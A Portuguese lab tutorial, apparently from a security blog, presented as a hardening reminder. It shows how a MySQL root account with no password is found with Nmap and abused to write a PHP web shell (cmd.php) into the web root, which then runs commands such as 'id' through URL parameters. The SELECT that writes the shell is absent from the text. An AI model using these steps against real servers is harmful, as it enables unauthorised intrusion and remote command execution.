Através do MySQL é possível executar comandos dentro de um servidor e o objetivo deste artigo é reforçar a importância de revisar as configurações de Hardening como as Permissões de usuários e diretórios, Senhas e Serviços ativos.
Kali Linux : 192.168.0.222
WebServer : 192.168.0.130
Após executar o Nmap no Webserver : 192.168.0.130 é possível confirmar que a porta 3306 (mysql) está aberta.
Linuxnmap 192.168.0.130
Através do Nmap é possível executar vários scripts e o script mysql-empty-password tem como objetivo verificar se o usuário root possui uma senha definida.
Neste caso é possível confirmar que a senha do root não foi definida.
Linuxnmap --script mysql-empty-password -p 3306 192.168.0.130
Para confirmar realize a conexão ao banco de dados do servidor Webserver através do comando a seguir :
Linuxmysql -u root -h 192.168.0.130
No servidor WebServer acesso o diretório do onde as páginas são publicadas no meu caso em : /var/www/html/ e lista o conteúdo :
Linuxcd /var/www/html/ ls -l
No Kali Linux onde a conexão foi estabelecida com o Banco de Dados execute o comando a seguir :
Após a execução deste select uma página nomeada como cmd.php será criada dentro do servidor WebServer permitindo que o atacante execute comandos através do navegador.
Copiar ComandoAo listar novamente o conteúdo do diretório do WebServer é possível visualizar um novo arquivo : cmd.php criado pelo usuário mysql.
Linuxls -l
Abra o navegador e acesse a url : http://ip-do-webserver/cmd.php?cmd=comandos, exemplos :
Comando : id - Exibe o id do usuário.
http://ip-do-webserver/cmd.php?cmd=id
Comando : ls -l / - Liste o conteúdo do diretório / (raiz).
http://ip-do-webserver/cmd.php?cmd=ls -l /